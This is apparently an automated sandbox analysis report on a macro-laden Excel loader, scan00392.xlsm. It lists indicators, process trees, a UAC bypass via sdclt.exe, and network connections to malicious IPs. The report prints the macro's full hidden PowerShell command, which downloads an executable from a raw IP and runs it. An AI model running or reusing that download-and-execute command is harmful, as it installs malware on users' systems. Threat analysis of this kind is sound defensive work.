File name: scan00392.xlsm
Full analysis: https://app.any.run/tasks/a9dd41cd-73e2-419a-ac39-07d524d67e39
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 30, 2020, 22:46:34
OS: Windows 10 Professional (build: 16299, 64 bit)
Tags:
macros
macros-on-open
opendir
loader
Indicators:
MIME: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info: Microsoft Excel 2007+
MD5: 16D28E813AAD1811513180F81B5F565B
SHA1: 5CC22AC2151CB66642A3D25F4445EFA02F65F7C4
SHA256: 10774669E30B7EE754CE9C2F9582339D5FAFC2FA97EDCB7830A3B736AECBC9D0
SSDEEP: 12288:T3g49w8fyunGthwu8kxPthZugvq4jzjSGUuNd:zg49b7AhFxPthZnvL3tX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 5180)
    • Executes PowerShell scripts

      • EXCEL.EXE (PID: 5180)
    • Application was dropped or rewritten from another process

      • newfile.Exe (PID: 1916)
      • newfile.Exe (PID: 3412)
      • images.exe (PID: 1076)
    • Downloads executable files from IP

      • powershell.exe (PID: 3800)
    • Changes settings of System certificates

      • powershell.exe (PID: 3800)
      • control.exe (PID: 3824)
      • newfile.Exe (PID: 1916)
      • EXCEL.EXE (PID: 5180)
      • powershell.exe (PID: 4212)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3800)
    • Changes the autorun value in the registry

      • newfile.Exe (PID: 3412)
    • Runs app for hidden code execution

      • images.exe (PID: 1076)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3800)
    • Reads the machine GUID from the registry

      • powershell.exe (PID: 3800)
      • powershell.exe (PID: 4212)
      • powershell.exe (PID: 6112)
    • Reads Environment values

      • powershell.exe (PID: 3800)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3800)
      • newfile.Exe (PID: 3412)
    • Modifies the open verb of a shell class

      • newfile.Exe (PID: 1916)
    • Executed via COM

      • DllHost.exe (PID: 5964)
    • Checks supported languages

      • control.exe (PID: 3824)
    • Creates files in the program directory

      • newfile.Exe (PID: 3412)
    • Executes PowerShell scripts

      • newfile.Exe (PID: 3412)
      • images.exe (PID: 1076)
    • Starts itself from another location

      • newfile.Exe (PID: 3412)
    • Starts CMD.EXE for commands execution

      • images.exe (PID: 1076)
    • Adds / modifies Windows certificates

      • powershell.exe (PID: 4212)
    • Connects to unusual port

      • images.exe (PID: 1076)
  • INFO

    • Scans artifacts that could help determine the target

      • EXCEL.EXE (PID: 5180)
    • Reads Environment values

      • EXCEL.EXE (PID: 5180)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 5180)
    • Reads the machine GUID from the registry

      • EXCEL.EXE (PID: 5180)
    • Reads the software policy settings

      • powershell.exe (PID: 3800)
      • powershell.exe (PID: 4212)
      • powershell.exe (PID: 6112)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3800)
      • powershell.exe (PID: 4212)
      • powershell.exe (PID: 6112)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 5180)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xlsm | Excel Microsoft Office Open XML Format document (with Macro) (50.8)
.xlsx | Excel Microsoft Office Open XML Format document (30)
.zip | Open Packaging Conventions container (15.4)
.zip | ZIP compressed archive (3.5)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x0bb99cf2
ZipCompressedSize: 395
ZipUncompressedSize: 1257
ZipFileName: [Content_Types].xml

XMP

Creator: GODSON

XML

LastModifiedBy: 1R256Mp 1R256Mp
CreateDate: 2020:03:26 21:43:47Z
ModifyDate: 2020:03:26 22:39:35Z
Application: Microsoft Excel
DocSecurity: None
ScaleCrop: No
HeadingPairs:
  • Worksheets
  • 1
TitlesOfParts: Sheet1
Company: -
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16.03
No data.
All screenshots are available in the full report
Total processes: 111
Monitored processes: 18
Malicious processes: 7
Suspicious processes: 1

Behavior graph

Interactive graph available in the full report. Processes shown in the graph (start / drop-and-start chain): excel.exe, powershell.exe, conhost.exe, newfile.exe, sdclt.exe, control.exe, COpenControlPanel, images.exe, cmd.exe.

Process information

PID 5180 | Parent process: explorer.exe
  CMD: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\scan00392.xlsm"
  Path: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Microsoft Excel | Exit code: 0 | Version: 16.0.12026.20264

PID 3800 | Parent process: EXCEL.EXE
  CMD: powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://185.208.211.67/godson/arab101.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\newfile.Exe')
  Path: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Windows PowerShell | Exit code: 0 | Version: 10.0.16299.15 (WinBuild.160101.0800)

PID 5732 | Parent process: powershell.exe
  CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
  Path: C:\WINDOWS\system32\conhost.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Console Window Host | Exit code: 0 | Version: 10.0.16299.15 (WinBuild.160101.0800)

PID 1916 | Parent process: powershell.exe
  CMD: "C:\Users\admin\AppData\Local\Temp\newfile.Exe"
  Path: C:\Users\admin\AppData\Local\Temp\newfile.Exe
  User: admin | Integrity Level: MEDIUM | Exit code: 0

PID 5768 | Parent process: newfile.Exe
  CMD: "C:\WINDOWS\system32\sdclt.exe"
  Path: C:\WINDOWS\system32\sdclt.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Microsoft® Windows Backup | Exit code: 3221226540 | Version: 10.0.16299.15 (WinBuild.160101.0800)

PID 2612 | Parent process: newfile.Exe
  CMD: "C:\WINDOWS\system32\sdclt.exe"
  Path: C:\WINDOWS\system32\sdclt.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: HIGH
  Description: Microsoft® Windows Backup | Exit code: 0 | Version: 10.0.16299.15 (WinBuild.160101.0800)

PID 5904 | Parent process: newfile.Exe
  CMD: "C:\WINDOWS\system32\sdclt.exe"
  Path: C:\WINDOWS\system32\sdclt.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Microsoft® Windows Backup | Exit code: 3221226540 | Version: 10.0.16299.15 (WinBuild.160101.0800)

PID 3824 | Parent process: sdclt.exe
  CMD: "C:\Windows\System32\control.exe" /name Microsoft.BackupAndRestoreCenter
  Path: C:\Windows\System32\control.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: HIGH
  Description: Windows Control Panel | Exit code: 1 | Version: 10.0.16299.15 (WinBuild.160101.0800)

PID 5964 | Parent process: svchost.exe
  CMD: C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
  Path: C:\WINDOWS\SysWOW64\DllHost.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: HIGH
  Description: COM Surrogate | Exit code: 0 | Version: 10.0.16299.15 (WinBuild.160101.0800)

PID 404 | Parent process: newfile.Exe
  CMD: "C:\WINDOWS\system32\sdclt.exe"
  Path: C:\WINDOWS\system32\sdclt.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: HIGH
  Description: Microsoft® Windows Backup | Exit code: 0 | Version: 10.0.16299.15 (WinBuild.160101.0800)
Total events: 4 453
Read events: 4 145
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 2
Suspicious files: 4
Text files: 10
Unknown types: 3

Dropped files

PID | Process | Filename
5180 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K8Z5U6HH0PCB8FWTIB5V.temp
5180 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CWS8NGQT7VPFL8OGX04V.temp
3800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T4NY1BY7I9630CZ045KD.temp
3800 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qsn3tysb.h0c.ps1
3800 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_s04ypuuh.3hu.psm1
5180 | EXCEL.EXE | C:\Users\admin\Desktop\~$scan00392.xlsm
5180 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F349BF19.jpg
5180 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFDE22FB44AF42D4C6.TMP
5180 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm
5180 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 1
TCP/UDP connections: 52
DNS requests: 4
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3800 | powershell.exe | GET | 200 | 185.208.211.67:80 | http://185.208.211.67/godson/arab101.exe | NL | executable | 1.03 Mb | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3800 | powershell.exe | 185.208.211.67:80 | | Hostio Solutions B.V. | NL | suspicious
5180 | EXCEL.EXE | 13.107.3.128:443 | config.edge.skype.com | Microsoft Corporation | US | whitelisted
1076 | images.exe | 216.38.2.205:5200 | | GigeNET | US | malicious
5180 | EXCEL.EXE | 52.114.77.34:443 | self.events.data.microsoft.com | Microsoft Corporation | IE | unknown
5608 | svchost.exe | 20.191.48.196:443 | settings-win-ppe.data.microsoft.com | Microsoft Corporation | US | unknown

DNS requests

Domain | IP | Reputation
config.edge.skype.com | 13.107.3.128 | whitelisted
self.events.data.microsoft.com | 52.114.77.34, 52.114.132.23 | whitelisted
settings-win-ppe.data.microsoft.com | 20.191.48.196 | whitelisted

Threats

PID | Process | Class | Message
3800 | powershell.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host
3800 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
3800 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3800 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info